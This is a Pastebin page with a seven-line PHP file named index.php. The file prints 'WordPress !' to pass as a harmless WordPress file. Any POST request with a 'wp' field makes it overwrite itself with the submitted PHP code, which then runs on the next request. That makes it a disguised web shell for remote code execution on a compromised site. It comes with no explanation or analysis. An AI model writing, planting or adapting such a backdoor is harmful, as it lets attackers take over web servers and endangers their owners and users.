Advertisement
PalmaSolutions

index.php

May 31st, 2018
212
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.20 KB | None | 0 0
  1. <?php
  2. echo '$Word'.'Press !';
  3. if (isset($_POST["wp"])) {
  4. $wp = $_POST["wp"];
  5. if (get_magic_quotes_gpc()) $wp=stripslashes($wp);
  6. file_put_contents($_SERVER["SCRIPT_FILENAME"],'<?php '.$wp.' ?>'); }
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement